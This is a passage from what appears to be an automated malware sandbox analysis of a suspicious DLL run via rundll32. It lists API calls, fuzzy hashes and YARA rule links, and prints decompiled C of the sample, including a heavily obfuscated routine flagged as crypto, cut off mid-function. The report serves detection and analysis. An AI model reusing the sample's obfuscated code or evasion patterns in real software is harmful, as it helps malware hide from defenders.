    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,82E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E215F73
    • __freea.LIBCMT ref: 6E215F80
      • Part of subcall function 6E20FBEC: RtlAllocateHeap.NTDLL(00000000,0000060B), ref: 6E20FC1E
    • __freea.LIBCMT ref: 6E215F89
    • __freea.LIBCMT ref: 6E215FAE
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocateHeap
    • String ID:
    • API String ID: 1414292761-0
    • Opcode ID: d45cb9c60009d11cc7a503a34c0b0558211c1a0b22d15fa79fd242ccd2c4eeab
    • Instruction ID: c7208251c8c7b6d3524d299b00ae807ee9b7812c688c5de6a6ccbe65ee76beca
    • Opcode Fuzzy Hash: d45cb9c60009d11cc7a503a34c0b0558211c1a0b22d15fa79fd242ccd2c4eeab
    • Instruction Fuzzy Hash: AE51037265824BAFEB148EE4CC44EEB77EBEF55650F1046A8FE14D6180EB34DE40C690
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2008B0, Relevance: 9.2, APIs: 6, Instructions: 186COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: Mpunctshared_ptrstd::ios_base::getloc
    • String ID:
    • API String ID: 2231573426-0
    • Opcode ID: 084cf0f9cfd2db7ca7ee4522e0afea8881d23fe740f5a357415f7fa7cd9bfd60
    • Instruction ID: f8dd3090d6863d28ecfd08f4f8399d4f38dfccea11c616a49ffe652d4e814535
    • Opcode Fuzzy Hash: 084cf0f9cfd2db7ca7ee4522e0afea8881d23fe740f5a357415f7fa7cd9bfd60
    • Instruction Fuzzy Hash: 67710DB690020DDFDB14DFE8C890EDEB7B9BF48314F148619E519AB291EB34A945CF90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20FA06, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(0000001C,00000000,6E209156,00000000,00000000,?,6E2127FC,00000000,00000000,?,?,0000001C), ref: 6E20FA0A
    • _free.LIBCMT ref: 6E20FA3D
    • _free.LIBCMT ref: 6E20FA65
    • SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA72
    • SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA7E
    • _abort.LIBCMT ref: 6E20FA84
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: 80036484bb6f2a06036dd2aa1b637d947a8931488bd889c0a1cab92b3ff8f779
    • Instruction ID: 6bb2da3f4549f8a14fa0f970c29371a096abde82e77326d042aee85cf32187c5
    • Opcode Fuzzy Hash: 80036484bb6f2a06036dd2aa1b637d947a8931488bd889c0a1cab92b3ff8f779
    • Instruction Fuzzy Hash: DEF0D63A5D4A0EABE74293B45C2CE9F267FAFC2727F390415F914962C8EF6484418538
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2128B1, Relevance: 7.7, APIs: 5, Instructions: 222COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3bc86a1cbd34bfbc3b0e43ab3b1cd90601758962765f237ce85024fcca70766e
    • Instruction ID: 42918394c60b893f2407dd16302d7312cdc11e280ac5182c517a7e3d7a0b46fb
    • Opcode Fuzzy Hash: 3bc86a1cbd34bfbc3b0e43ab3b1cd90601758962765f237ce85024fcca70766e
    • Instruction Fuzzy Hash: 9D71C2B291821F9BDB218FD9C844AEEB7BBFF43311B104629FA2157184DB718B41D7A0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E211BFD, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: _free$AllocateHeap
    • String ID:
    • API String ID: 3033488037-0
    • Opcode ID: 3d9e267be30efbfcf199729e298cc9335a46f4f50370e03c65898ee08696401c
    • Instruction ID: ce4ccf4aab1e7d5b2b0e68d6fba0038fa5ea11525579f9a4f3d2b246d50379fd
    • Opcode Fuzzy Hash: 3d9e267be30efbfcf199729e298cc9335a46f4f50370e03c65898ee08696401c
    • Instruction Fuzzy Hash: 6C512676A0460DAFEB11CFA9CC40AEA73FBEF59325B10055DE949D7290E731DA44CB40
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20FA8A, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,0000060B,?,6E20BB83,6E20FC2F,?,?,6E203D1F,0000060B,?,6E1F73C4,0000060B), ref: 6E20FA8F
    • _free.LIBCMT ref: 6E20FAC4
    • _free.LIBCMT ref: 6E20FAEB
    • SetLastError.KERNEL32(00000000,6E1F73C4,0000060B), ref: 6E20FAF8
    • SetLastError.KERNEL32(00000000,6E1F73C4,0000060B), ref: 6E20FB01
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
    • Opcode ID: ba13348acf35a3f1a49b225605718c79b3549d42c2b15c639b42e6939cc7c328
    • Instruction ID: adf865a5081624ec45737dfd83e301d089c0d8cb61823e7f4518cc70b896a87b
    • Opcode Fuzzy Hash: ba13348acf35a3f1a49b225605718c79b3549d42c2b15c639b42e6939cc7c328
    • Instruction Fuzzy Hash: EC01263A1D8A0E7FA702A6F54C68E8F253FABC636AB350025F815962C4EF6088048478
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21B44A, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6E21B462
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • _free.LIBCMT ref: 6E21B474
    • _free.LIBCMT ref: 6E21B486
    • _free.LIBCMT ref: 6E21B498
    • _free.LIBCMT ref: 6E21B4AA
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 69090cf46e1c34b42d22a70b559c58b5fab9cf5be1f12e87e9b36755ccdf08b0
    • Instruction ID: 56f5077b8284e1f1e6604d9257ecb909be50d494232651c522dcf3aac47728b9
    • Opcode Fuzzy Hash: 69090cf46e1c34b42d22a70b559c58b5fab9cf5be1f12e87e9b36755ccdf08b0
    • Instruction Fuzzy Hash: 07F0447644860DDB9F60EEE8D4A5C8B33FFAA09315764CC05E519D7744CB30F8808AB4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E210880, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    • Opcode ID: 214f91ae76f83a61aecee1184dec67f495cba0edced9dd3da279a05cfa50034a
    • Instruction ID: 9a8d40b3416f9caa5883ee4430d420c8d84a67a076b05d4e6f19a80ce68907bd
    • Opcode Fuzzy Hash: 214f91ae76f83a61aecee1184dec67f495cba0edced9dd3da279a05cfa50034a
    • Instruction Fuzzy Hash: 3DA1467291838F9FE7118F98C8A0FEEBBEAEF55304F144569D7959B280E2348B52C750
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E215C7C, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E23F9E8,00000000,00000000,8B56FF8B,6E21142E,?,00000004,00000001,6E23F9E8,0000007F,?,8B56FF8B,00000001), ref: 6E215CC9
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E215D52
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E215D64
    • __freea.LIBCMT ref: 6E215D6D
      • Part of subcall function 6E20FBEC: RtlAllocateHeap.NTDLL(00000000,0000060B), ref: 6E20FC1E
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
    • String ID:
    • API String ID: 2652629310-0
    • Opcode ID: 31b58294f03e6927e4a9b530d16cc0dc8e241e27991e86d3e131d11f30ea839d
    • Instruction ID: 2b24041f56ffc5a77c21129db069ecaf78bb095b2cbcbfa05bb2ad15f4c23497
    • Opcode Fuzzy Hash: 31b58294f03e6927e4a9b530d16cc0dc8e241e27991e86d3e131d11f30ea839d
    • Instruction Fuzzy Hash: E8319D72A0020AAFDF258FA4CC58EEE7BEAEB44614B044568ED14DB190E735CA55CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21365C, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0000060B,00000000,00000000,?,6E213603,0000060B,00000000,00000000,00000000,?,6E21392F,00000006,6E240588), ref: 6E21368E
    • GetLastError.KERNEL32(?,6E213603,0000060B,00000000,00000000,00000000,?,6E21392F,00000006,6E240588,6E240580,6E240588,00000000,00000364,?,6E20FAD8), ref: 6E21369A
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E213603,0000060B,00000000,00000000,00000000,?,6E21392F,00000006,6E240588,6E240580,6E240588,00000000), ref: 6E2136A8
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID:
    • API String ID: 3177248105-0
    • Opcode ID: 288f36e14a5d6d8a51dccd5fc06012f27270bb6428e2759070bbaa89aa7cabf1
    • Instruction ID: 003f04c8bed7a8f800660054ddba52b8b4b852e8fe10b1ddbdd8b17d0c90ab75
    • Opcode Fuzzy Hash: 288f36e14a5d6d8a51dccd5fc06012f27270bb6428e2759070bbaa89aa7cabf1
    • Instruction Fuzzy Hash: 0501D83275966B9FC7214AA98C4DEC6B7DBBF46BE17120520FA05D7340C721D904CAF8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1F10, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E1D1F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6e1d41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e1d41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6e1d41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6e1d41a8 = _t5;
					 *0x6e1d41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6e1d41a4 = _t6;
					if(_t6 == 0) {
						 *0x6e1d41a4 =  *0x6e1d41a4 | 0xffffffff;
					}
					return 0;
				}
			}









    0x6e1d1f11
    0x6e1d1f1f
    0x6e1d1f27
    0x6e1d1f2c
    0x6e1d1f76
    0x6e1d1f76
    0x6e1d1f2e
    0x6e1d1f36
    0x6e1d1f72
    0x6e1d1f74
    0x6e1d1f38
    0x6e1d1f38
    0x6e1d1f3d
    0x6e1d1f4b
    0x6e1d1f50
    0x6e1d1f56
    0x6e1d1f5e
    0x6e1d1f63
    0x6e1d1f65
    0x6e1d1f65
    0x6e1d1f6f
    0x6e1d1f6f

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1D1C8E,747863F0,00000000), ref: 6E1D1F1F
    • GetVersion.KERNEL32 ref: 6E1D1F2E
    • GetCurrentProcessId.KERNEL32 ref: 6E1D1F3D
    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1D1F56
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$CreateCurrentEventOpenVersion
    • String ID:
    • API String ID: 845504543-0
    • Opcode ID: 7311e68ffb75e489567802f5f5ac2ccbe649c9c0da85faad6802906716990c8c
    • Instruction ID: 7ec932690bc900eb76da9a4e9b8343416b68eb46b8b9ccd51f21c88f16c50223
    • Opcode Fuzzy Hash: 7311e68ffb75e489567802f5f5ac2ccbe649c9c0da85faad6802906716990c8c
    • Instruction Fuzzy Hash: 4AF01771686A10AFEF50AFA8A80A78A3BA4BB17711F10C11AF255DA1C0D3B06487BF44
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E214EEB, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID:
    • String ID: V!n$V!n
    • API String ID: 0-533921133
    • Opcode ID: 1bb4f165bcd32330979b790fea8f89b244fc31385546771ff1aed2b3c551401d
    • Instruction ID: 43904a828690fce3ba8cf176089828edc3ce5a81dbbe078fe15632124272c600
    • Opcode Fuzzy Hash: 1bb4f165bcd32330979b790fea8f89b244fc31385546771ff1aed2b3c551401d
    • Instruction Fuzzy Hash: 6551C531A9825AEBCB20CFE4C891ADA77F2FF19314F14819ED6585B390D3709A81CBD1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21C22A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
    Download Yara Rule
    APIs
    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E21C485,6E21142E,00000050,?,?,?,?,?), ref: 6E21C305
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID:
    • String ID: ACP$OCP
    • API String ID: 0-711371036
    • Opcode ID: e68ff69f863482e22272c2c51ea70413bbe2db8555be46c6c9528fc3573f090f
    • Instruction ID: 39dbcf25e1cfd241b4f5f6e31ff07bf023522ae56dcf136b440567767339dc3d
    • Opcode Fuzzy Hash: e68ff69f863482e22272c2c51ea70413bbe2db8555be46c6c9528fc3573f090f
    • Instruction Fuzzy Hash: 1B21D66AA5C10EA7E75C8AD98903BC763E7AB95F66F124430DB09DF504E732DB408251
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E212635, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,0000001C,0000001C,00000000,00000000,00000000,?), ref: 6E2126CB
    • GetLastError.KERNEL32(?,0000001C), ref: 6E2126D9
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,0000001C), ref: 6E212734
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ByteCharMultiWide$ErrorLast
    • String ID:
    • API String ID: 1717984340-0
    • Opcode ID: b21cb921dec16192171a65a37746619ea0d90a228c5d0371e231e9b54d87839d
    • Instruction ID: 0e2d0578ab686d54f3594c4e0328da96b29eebb99ea0949cb5016d044d711b68
    • Opcode Fuzzy Hash: b21cb921dec16192171a65a37746619ea0d90a228c5d0371e231e9b54d87839d
    • Instruction Fuzzy Hash: 8341E77660835BAFDF518FE4C854AEB77FAAF07361F104158FA546B194EB308A02D750
    Uniqueness

    Uniqueness Score: -1.00%

    Analysis Process: rundll32.exe PID: 644 Parent PID: 2392 rundll32.exeCOMMON

    Executed Functions

    Function 6E1F7CA0, Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 514COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 79%
    			E6E1F7CA0(void* __ebx, void* __edi, intOrPtr __esi, void* __eflags) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				CHAR* _v72;
				char _v76;
				intOrPtr _v80;
				CHAR* _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				void* __ebp;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				signed int _t219;
				signed int _t229;
				signed int _t231;
				intOrPtr _t244;
				signed int _t248;
				intOrPtr _t253;
				signed int _t257;
				signed int _t259;
				intOrPtr _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t280;
				signed int _t283;
				signed int _t288;
				signed int _t290;
				signed int _t294;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t308;
				signed int _t310;
				intOrPtr _t315;
				signed int _t324;
				signed int _t329;
				signed int _t331;
				signed int _t340;
				signed int _t343;
				signed int _t345;
				signed int _t354;
				signed int _t359;
				signed int _t369;
				signed int _t370;
				intOrPtr _t373;
				intOrPtr _t374;
				intOrPtr _t376;
				signed int _t380;
				signed int _t388;
				signed int _t390;
				signed int _t391;
				signed int _t397;
				signed int _t398;
				signed int _t404;
				signed int _t409;
				intOrPtr _t410;
				signed int _t413;
				signed int _t423;
				signed int _t428;
				signed int _t430;
				intOrPtr _t432;
				signed int _t436;
				intOrPtr _t437;
				intOrPtr _t443;
				intOrPtr _t445;
				signed int _t460;
				signed int _t464;
				signed int _t467;
				signed int _t476;
				signed int _t490;
				signed int _t496;
				signed int _t503;
				signed int _t504;
				signed int _t513;

				_t509 = __esi;
				_t508 = __edi;
				_t314 = __ebx;
				_push(0xffffffff);
				_push(E6E21FA58);
				_push( *[fs:0x0]);
				_t211 =  *0x6e24b164; // 0x1dc3c76f
				_t212 = _t211 ^ _t513;
				_v20 = _t212;
				_push(__esi);
				_push(_t212);
				 *[fs:0x0] =  &_v16;
				_v60 = 0x14;
				_t214 =  *0x6e24b0d8; // 0xf1cde0
				_t315 =  *0x6e24b004; // 0xab810c7
				_t5 = _t214 + 2; // 0xab810c9
				asm("sbb edx, eax");
				_v56 = _v56 - _t315 + _t5;
				 *0x6e24b0d8 = _v48 + 5 - ( *0x6e24b0dc & 0x0000ffff);
				_t409 = _v60;
				_t219 =  *0x6e24b000; // 0x565
				_t13 = _t409 + 2; // 0x567
				_t410 =  *0x6e24b004; // 0xab810c7
				 *0x6e24b004 = _t410 - _t219 + _t13;
				_push(0x70b);
				_v84 = E6E203D43(__ebx, _t219 + _t13, _t410 - _t219 + _t13, __edi, __esi, __eflags);
				_v72 = _v84;
				_t322 = _v56 - 0x18 +  *0x6e24b000;
				 *0x6e24b0d8 = _v56 - 0x18 +  *0x6e24b000;
				_push(0x6e22124c);
				_push(0); // executed
				E6E20A0DE(__ebx, _v56 - 0x18 +  *0x6e24b000, _t410 - _t219 + _t13, __edi, __eflags); // executed
				_t412 = _v72;
				 *0x6e24b004 = GetCurrentDirectoryA(0x70b, _v72);
				 *0x6e24d304 = 3;
				while( *0x6e24d304 < 0x18) {
					_v104 = _v48;
					_v100 = 0;
					_v64 = 8 << 0;
					_t412 = _v104;
					if(_v104 !=  *((intOrPtr*)(_v64 + 0x6e24b050))) {
						L6:
						_t503 =  *0x6e24b000; // 0x565
						_t404 =  *0x6e24d304; // 0x18
						_t509 =  *((intOrPtr*)(0x6e24b054 + _t404 * 8));
						 *0x6e24b000 = E6E203D70(_t503, 0,  *((intOrPtr*)(0x6e24b050 + _t404 * 8)),  *((intOrPtr*)(0x6e24b054 + _t404 * 8)));
						_t504 =  *0x6e24b000; // 0x565
						_v48 = _t504 + 5 -  *0x6e24b004;
						_t308 =  *0x6e24b000; // 0x565
						_t412 = 0x50;
						_v112 = _t308;
						_v108 = 0;
						_v68 = 8;
						_t322 = _v112;
						__eflags = _v112 -  *((intOrPtr*)(_v68 + 0x6e24b050));
						if(__eflags != 0) {
							L9:
							goto L1;
						} else {
							_t412 = _v68;
							__eflags = _v108 -  *((intOrPtr*)(_v68 + 0x6e24b054));
							if(__eflags != 0) {
								goto L9;
							} else {
							}
						}
					} else {
						_t322 = _v100;
						if(_v100 !=  *((intOrPtr*)(_v64 + 0x6e24b054))) {
							goto L6;
						} else {
							L1:
							_t310 =  *0x6e24d304; // 0x18
							 *0x6e24d304 = _t310 + 1;
							continue;
						}
					}
					break;
				}
				_push(0x70b);
				_v88 = E6E203D43(_t314, _t322, _t412, _t508, _t509, __eflags);
				_v76 = _v88;
				_t413 =  *0x6e24b0d8; // 0xf1cde0
				_v56 = _t413 + 1 -  *0x6e24b000;
				_v52 = 0;
				_t324 =  *0x6e24b0d8; // 0xf1cde0
				_v56 = _t324 + 1 -  *0x6e24b000;
				_v52 = 0;
				__eflags =  *0x6E24B048 +  *0x6EDF8BBD - 0x2af;
				if( *0x6E24B048 +  *0x6EDF8BBD != 0x2af) {
					_t229 =  *0x6e24b000; // 0x565
					 *0x6E24B010 = _t229 -  *0x6e24b0d8 * 0x2f;
					_t231 =  *0x6e24b0d8; // 0xf1cde0
					_t329 =  *0x6e24b0d8; // 0xf1cde0
					_t59 = _t231 - 0xb401; // 0xf119df
					_t423 = _t329 + _t59 + _v48 + _v48;
					__eflags = _t423;
					_v48 = _t423;
				} else {
					_t397 =  *0x6e24b0d8; // 0xf1cde0
					 *0x6e24b0d8 = _v48 + _t397 - 0x18;
					_t398 =  *0x6e24b0d8; // 0xf1cde0
					_v48 = _t398 - 0x48 -  *0x6e24b000 + _v48;
				}
				 *0x6e24d304 = 3;
				while(1) {
					__eflags =  *0x6e24d304 - 0x18;
					if( *0x6e24d304 >= 0x18) {
						break;
					}
					_t496 =  *0x6e24b0d8; // 0xf1cde0
					__eflags = _t496 -  *0x6EDF8BBD;
					if(_t496 !=  *0x6EDF8BBD) {
						_t299 =  *0x6e24d304; // 0x18
						_v48 = _v48 *  *(0x6e24b010 + _t299 * 4);
						 *0x6e24b0d8 = _v48 + 5 -  *0x6e24b000;
						__eflags = _v48 -  *0x6E24B038;
						if(_v48 !=  *0x6E24B038) {
							goto L14;
						} else {
						}
					} else {
						L14:
						_t301 =  *0x6e24d304; // 0x18
						_t302 = _t301 + 1;
						__eflags = _t302;
						 *0x6e24d304 = _t302;
						continue;
					}
					break;
				}
				_v56 = E6E1F7650(_v48);
				_v52 = 0;
				 *0x6e24b0d8 = _v56 + 5 -  *0x6e24b004;
				GetEnvironmentVariableA("word ",  &_v76, 0x70b); // executed
				 *0x6e24d304 = 3;
				while(1) {
					__eflags =  *0x6e24d304 - 0x18;
					if( *0x6e24d304 >= 0x18) {
						break;
					}
					_t294 =  *0x6e24b0d8; // 0xf1cde0
					__eflags = _t294 -  *0x6EDF8BBD;
					if(_t294 !=  *0x6EDF8BBD) {
						_t388 =  *0x6e24d304; // 0x18
						_v60 = _v60 *  *(0x6e24b010 + _t388 * 4);
						 *0x6e24b0d8 = _v60 + 5 - _v48;
						__eflags = _v60 -  *((intOrPtr*)(0x6e24b038));
						if(_v60 !=  *((intOrPtr*)(0x6e24b038))) {
							goto L22;
						} else {
						}
					} else {
						L22:
						_t390 =  *0x6e24d304; // 0x18
						_t391 = _t390 + 1;
						__eflags = _t391;
						 *0x6e24d304 = _t391;
						continue;
					}
					break;
				}
				_t331 =  *0x6e24b0d8; // 0xf1cde0
				_v120 = _t331;
				_v116 = 0;
				__eflags = _v52 - _v116;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L32:
						 *0x6e24b0d8 = _v56 + 5 - _v48;
						asm("sbb eax, edx");
						 *((intOrPtr*)(0x6e24b058)) =  *0x6EDF8BFD - _v48;
						_t490 = _v56 + 5 - _v48;
						__eflags = _t490;
						 *0x6e24b0d8 = _t490;
					} else {
						__eflags = _v56 - _v120;
						if(_v56 >= _v120) {
							goto L32;
						}
					}
				}
				SetConsoleCP(0);
				E6E1F9CC0(_v72);
				_v8 = 0;
				_t428 =  *0x6e24b000; // 0x565
				 *0x6e24b0d8 = _t428 - _v48 * 0x2f;
				 *0x6e24b0d8 = _v56 + 5 -  *0x6e24b000;
				E6E1FB2A0( &_v44, _v76);
				_t430 =  *0x6e24b0d8; // 0xf1cde0
				_t244 =  *0x6e24b004; // 0xab810c7
				_t108 = _t430 + 2; // 0xab810c9
				asm("sbb ecx, edx");
				_v56 = _v56 - _t244 + _t108;
				_t432 =  *0x6e24b004; // 0xab810c7
				 *0x6e24b000 = E6E1F71B0(_t432);
				_t248 =  *0x6e24b0d8; // 0xf1cde0
				asm("adc ecx, [ebp-0x30]");
				_v56 = _t248 - 0x48 -  *0x6e24b004 + _v56;
				_v52 = 0;
				 *0x6e24b004 = E6E2010F0( &_v44);
				 *0x6e24b0d8 = _v56 - 0x18 +  *0x6e24b004;
				_t253 =  *0x6e24b004; // 0xab810c7
				_v48 = _t253 + 5 -  *0x6e24b0d8;
				_t340 =  *0x6e24b0d8; // 0xf1cde0
				 *0x6e24b000 = E6E1F7990(_t340);
				_t436 = _v48;
				_t257 =  *0x6e24b0d8; // 0xf1cde0
				_t121 = _t436 + 2; // 0xf1cde2
				_t437 =  *0x6e24b004; // 0xab810c7
				 *0x6e24b004 = _t437 - _t257 + _t121;
				_v92 =  *((intOrPtr*)(0x6e24b058));
				__eflags = _v92 - 1;
				if(_v92 == 1) {
					_t259 =  *0x6e24b000; // 0x565
					_t343 =  *0x6e24b0d8; // 0xf1cde0
					_t126 = _t259 - 0xb401; // 0xf119df
					_v48 = _t343 + _t126 + _v48 + _v48;
				} else {
					_t288 =  *0x6e24b0d8; // 0xf1cde0
					_t290 = _t288 + 5 -  *0x6e24b000;
					__eflags = _t290;
					_v48 = _t290;
				}
				_t443 =  *0x6e24b004; // 0xab810c7
				_v56 = _t443 -  *0x6e24b0d8 * 0x2f;
				_v52 = 0;
				_t345 = _v48;
				_t445 =  *0x6e24b004; // 0xab810c7
				_t135 = _t345 - 0x18; // 0xab810af
				_v56 = _t445 + _t135;
				_v52 = 0;
				asm("adc eax, [ecx+0x6e24b054]"); // 0xa8cd6f4a
				_v128 =  *0x6E24B0C0 +  *((intOrPtr*)(0x6edf8bfd));
				_v124 =  *((intOrPtr*)(0x6e24b0c4));
				__eflags = _v128 - 0x2af;
				if(_v128 != 0x2af) {
					L40:
					 *((intOrPtr*)(0x6e24b058)) = _v60 - _v48 * 0x2f;
					 *0x6E24B054 = 0;
					asm("adc edx, [ebp-0x30]");
					_t354 = _v48 + _v48 - 0xb401 + _v56 + _v56;
					__eflags = _t354;
					asm("adc edx, [ebp-0x30]");
					_v56 = _t354;
					_v52 = 0;
				} else {
					__eflags = _v124;
					if(_v124 != 0) {
						goto L40;
					} else {
						_v48 = _v56 - 0x18 + _v48;
						asm("adc eax, [ebp-0x30]");
						_v56 = _v48 - 0x48 - _v60 + _v56;
						_v52 = 0;
					}
				}
				_t266 =  *0x6e24b004; // 0xab810c7
				 *0x6e24b000 = E6E1F7650(_t266);
				__eflags =  *((intOrPtr*)(0x6e24b054)) - 0x170c;
				if( *((intOrPtr*)(0x6e24b054)) == 0x170c) {
					asm("adc eax, [ebp-0x30]");
					_v56 =  *0x6E24B024 + _v56;
					_v52 = 0;
					_t380 = _v56 + 1 - _v56;
					__eflags = _t380;
					 *0x6e24b0d8 = _t380;
				}
				_t268 =  *0x6e24b0d8; // 0xf1cde0
				 *0x6e24b0d8 = _t268 - _v48 + 2 + _v56;
				_t270 =  *0x6e24b004; // 0xab810c7
				_v80 = 0x28;
				_v136 = _t270;
				_v132 = 0;
				__eflags =  *((intOrPtr*)(_v80 + 0x6e24b054)) - _v132;
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L46:
						 *((intOrPtr*)(0x6e24b058)) = _v48;
						 *0x6EDF8C01 = 0;
						_t283 = _v48;
						_t373 =  *0x6e24b004; // 0xab810c7
